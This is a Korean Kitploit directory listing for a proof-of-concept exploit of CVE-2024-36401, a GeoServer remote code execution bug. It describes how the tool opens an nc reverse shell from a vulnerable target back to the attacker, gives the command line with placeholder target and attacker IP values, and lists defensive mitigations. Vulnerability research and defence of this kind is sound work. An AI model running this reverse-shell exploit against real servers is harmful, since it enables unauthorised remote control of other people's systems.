Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/bigb0x/cve-2024-36401
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubbigb0x/cve-2024-36401

CVE-2024-36401

CVE-2024-36401에 대한 PoC입니다. 이 PoC는 취약한 대상에서 리버스 셸을 설정하려고 시도합니다.

저장소 보기
341512년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-36401에 대한 RCE

CVE-2024-36401 GeoServer에 대한 POC입니다. 이 POC는 대상으로부터 역방향 시스템 셸을 설정하려고 시도합니다.

Banner

개요

CVE-2024-36401에 대한 POC: GeoServer 2.25.1, 2.24.3 및 2.23.5 이전 버전의 GeoServer에 대한 RCE입니다. 이 POC는 phith0n의 보안 권고를 기반으로 합니다.

작동 방식

  1. 대상으로부터 오는 역방향 셸을 수신하기 위해 사용자 시스템에 리스너를 설정합니다.
  2. 이 POC는 페이로드와 함께 POST 요청을 보냅니다.
  3. 대상 서버에 셸을 설정하려고 시도합니다.
  4. 이 기술은 대상에 nc가 설치되어 있다고 가정합니다.

사용 방법

이 POC는 취약한 대상으로부터 역방향 셸을 설정하려고 시도합니다. 이는 취약한 Linux 대상을 대상으로 합니다. 이 POC를 실행하려면 공개 및 접근 가능한 IP를 가진 시스템이 필요합니다.

최소 요구 사항

  • Python 3.6 이상
  • requests 라이브러리

단일 대상에 대해 이 POC를 사용하려면:

root@kitploit:~
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type

도움말:

root@kitploit:~
python3 CVE-2024-36401.py  -h

options:
  -h, --help  show this help message and exit
  -u U        Target, example https://target:8080
  -ip IP      Your IP, example 192.168.1.1
  -port PORT  Port, example 1337
  -type TYPE  Type, example sf:archsites

GeoServer 어플라이언스를 보호하는 방법

1- WFS 요청을 비활성화하세요.

2- iptables를 구성하여 역방향 연결을 비활성화하고, 기본 정책을 모든 트래픽 차단으로 설정하고, 설정된 연결 및 관련 연결을 허용하고, DNS, HTTP, HTTPS와 같은 필수 아웃바운드 트래픽만 허용하여 Linux를 보호하세요.

3- 또는 최신 버전의 GeoServer로 업그레이드하세요.

연락처

제안 사항이나 의견이 있으시면 저에게 연락해 주세요.

면책 조항

저는 재미, 업무 및 교육 목적으로만 도구를 만드는 것을 좋아합니다. 저는 어떤 시스템이나 네트워크에 대한 해킹이나 무단 액세스를 지원하거나 장려하지 않습니다. 제 도구를 책임감 있게 사용하고, 명확한 테스트 권한이 있는 시스템에서만 사용하십시오.

도구 다운로드